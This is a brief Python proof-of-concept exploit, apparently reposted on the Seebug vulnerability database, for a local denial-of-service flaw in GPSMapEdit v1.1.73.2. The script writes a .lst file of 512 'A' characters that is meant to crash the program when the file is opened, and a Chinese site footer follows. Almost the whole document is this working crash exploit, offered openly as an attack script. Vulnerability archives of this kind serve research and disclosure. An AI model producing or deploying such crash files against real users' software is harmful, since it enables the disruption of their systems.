#!/usr/bin/python # Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability # Version: 1.1.73.2 # Date: 2012-01-08 # Author: Julien Ahrens # Homepage: www.inshell.net # Software Link: http://www.geopainting.com # Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit German file="GPSMapEdit_crash.lst" junk="\x41"*512 print "[*] Creating crash file...\n"; writeFile = open (file, "w") writeFile.write(junk) writeFile.close() print "[*] File successfully created!\n\n";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论